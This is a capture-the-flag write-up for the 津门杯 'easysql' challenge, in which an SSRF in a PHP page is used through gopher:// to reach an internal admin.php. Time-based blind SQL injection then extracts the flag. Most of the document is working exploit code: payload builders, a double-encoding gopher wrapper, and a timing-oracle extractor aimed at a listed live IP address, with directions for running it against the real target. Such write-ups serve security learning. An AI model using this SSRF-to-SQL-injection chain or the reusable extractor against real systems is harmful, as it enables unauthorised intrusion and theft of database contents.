津门杯 easysql

Probably the first time I've run into SSRF being used to deliver SQL injection.

The code of index.php:


<?php
highlight_file(__FILE__);
session_start();
$url = $_GET['url'] ?? false;
if ($url) {
    // Blacklist only: file:// and dict:// are rejected, gopher:// is not
    $a = preg_match("/file|dict/i", $url);
    if ($a == 1) {
        exit();
    }

    // curl fetches whatever scheme and host we supply: a plain SSRF
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}
?>

Other players said they found admin.php by scanning (I didn't find it myself....)
[Figure 1]
It asks us to submit a poc parameter.
index.php is an obvious SSRF, and given the challenge name the idea is to use the SSRF to deliver SQL injection: the blacklist only blocks file and dict, so gopher:// gets through and lets us write a raw HTTP POST to admin.php on 127.0.0.1.
After that it is just a question of how to construct the payload...

In the end the closing turned out to be a parenthesis; the other players are really good.
There is no visible difference in the response, so it has to be time-based blind injection...

import urllib.parse

# Confirm the injection point: if admin.php's query sleeps for 3 s, the ')' closing is right
payload = "poc=0) or sleep(3) #"

# Raw HTTP POST that curl will write to 127.0.0.1:80 over gopher://
test = \
"""POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Connection: close

%s
""" % (len(payload), payload)
tmp = urllib.parse.quote(test)

# HTTP needs CRLF line endings; then encode a second time because
# PHP decodes $_GET['url'] once and curl decodes the gopher path once more
new = tmp.replace('%0A', '%0D%0A')
new = new.replace('%', '%25')
result = '_' + new   # leading '_' is the gopher item type byte, stripped by curl

url = 'http://121.36.147.29:20001/?url=gopher://127.0.0.1:80/' + result

print(url)
Then extract the flag one character at a time, binary-searching each ascii value; a response slower than 0.4 s means the injected sleep(0.5) fired:

import urllib.parse
import requests
import time

url = 'http://121.36.147.29:20001/?url='
flag = ''
for i in range(1, 100):
    low = 32
    high = 128
    mid = (low + high) // 2

    while low < high:
        # The IF() sleeps only when ascii(flag[i]) > mid
        payload = "poc=0) or if((ascii(substr((select flag from flag),{},1)))>{},sleep(0.5),1) #".format(i, mid)
        test = \
"""POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Connection: close

%s
""" % (len(payload), payload)
        tmp = urllib.parse.quote(test)

        # CRLF line endings, then double-encode (PHP decodes once, curl once more)
        new = tmp.replace('%0A', '%0D%0A')
        new = new.replace('%', '%25')
        result = '_' + new

        url = 'http://121.36.147.29:20001/?url=gopher://127.0.0.1:80/' + result

        print(url)
        time1 = time.time()
        r = requests.get(url)
        time2 = time.time()
        print(low, mid, high)
        print(time2 - time1)
        if time2 - time1 > 0.4:   # slept: the character is above mid
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # loop ends with low == high == mid == ascii value; past the end of the
    # flag ascii('') is 0, which this 32..127 range reports as chr(32)
    flag += chr(mid)
    print(flag)
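As an added example, not code from the challenge or from the original writeup, the same chain rewritten as testable functions: an HTTP POST builder that counts Content-Length in bytes, the double-encoding gopher wrapper, a decoder for checking a payload before it is sent, and the binary-search extractor driven by a pluggable oracle. The timing oracle assumes the page's target (127.0.0.1:80/admin.php, parameter poc, a table and column both named flag); the offline run substitutes a constructed secret string for the database. It goes one step beyond the page's script by starting the search at 0 instead of 32, so the end of the flag, where MySQL's ascii('') is 0, is detected and the loop stops.

```python
import time
import urllib.parse


def build_http_post(host, path, body):
    """Return the raw bytes of an HTTP/1.1 POST with a correct Content-Length.

    Content-Length counts bytes, not characters, so the body is encoded first.
    CRLF line endings are written explicitly: that is what admin.php expects
    once curl's gopher handler has written the bytes to the socket.
    """
    body_bytes = body.encode()
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body_bytes)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return head.encode() + body_bytes


def to_gopher(raw, target="127.0.0.1", port=80):
    """Wrap raw TCP bytes in a gopher:// URL that survives the ?url= hop.

    The payload is percent-encoded twice: PHP decodes $_GET['url'] once and
    curl decodes the gopher path once more before writing it to the socket.
    The leading '_' is the gopher item-type byte, which curl strips.
    """
    once = urllib.parse.quote(raw)        # b"\r\n" -> %0D%0A, " " -> %20, ...
    twice = once.replace("%", "%25")      # %0D%0A -> %250D%250A
    return f"gopher://{target}:{port}/_{twice}"


def decode_gopher(url):
    """Undo both encoding layers: what curl will actually send for this URL."""
    path = url.split("/_", 1)[1]
    return urllib.parse.unquote_to_bytes(urllib.parse.unquote(path))


def ssrf_url(base, raw):
    """Full URL to hand to index.php (assumed base, e.g. 'http://host:port/')."""
    return base + "?url=" + to_gopher(raw)


def extract_blind(oracle, max_len=64):
    """Recover a string by binary search on ascii() of each character.

    oracle(pos, mid) must return True exactly when ascii(substr(s, pos, 1)) > mid
    (pos is 1-based, as in MySQL). Searching from 0 instead of 32 means a
    position past the end of the string, where ascii('') is 0, ends the loop
    instead of appending a bogus character.
    """
    out = ""
    for pos in range(1, max_len + 1):
        low, high = 0, 128
        while low < high:
            mid = (low + high) // 2
            if oracle(pos, mid):
                low = mid + 1
            else:
                high = mid
        if low == 0:
            break
        out += chr(low)
    return out


def simulated_oracle(secret):
    """Offline stand-in for the database, answering the same yes/no question."""
    def oracle(pos, mid):
        code = ord(secret[pos - 1]) if pos <= len(secret) else 0  # ascii('') = 0
        return code > mid
    return oracle


def timing_oracle(base, delay=1.0, threshold=0.8, timeout=10):
    """Live oracle: the injected IF() sleeps only when the guess is true.

    threshold must exceed the normal round trip index.php -> curl -> admin.php
    -> MySQL; measure that first and choose delay at roughly twice it.
    A request that hits the timeout is treated as having slept.
    """
    import requests  # imported lazily so the offline functions run without it

    def oracle(pos, mid):
        body = (f"poc=0) or if((ascii(substr((select flag from flag),{pos},1)))"
                f">{mid},sleep({delay}),1) #")
        raw = build_http_post("127.0.0.1", "/admin.php", body)
        t0 = time.monotonic()
        try:
            requests.get(ssrf_url(base, raw), timeout=timeout)
        except requests.exceptions.Timeout:
            return True
        return time.monotonic() - t0 > threshold
    return oracle


if __name__ == "__main__":
    # Offline demonstration with a constructed secret, then the live URL for the sleep(3) probe
    print(extract_blind(simulated_oracle("flag{constructed_sample}")))
    print(ssrf_url("http://121.36.147.29:20001/",
                   build_http_post("127.0.0.1", "/admin.php", "poc=0) or sleep(3) #")))
```

To run it against the real target, replace `simulated_oracle(...)` with `timing_oracle("http://121.36.147.29:20001/")`; `decode_gopher` is the quickest way to confirm that the bytes curl will emit are the request you intended before spending a round trip on each guess.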
  
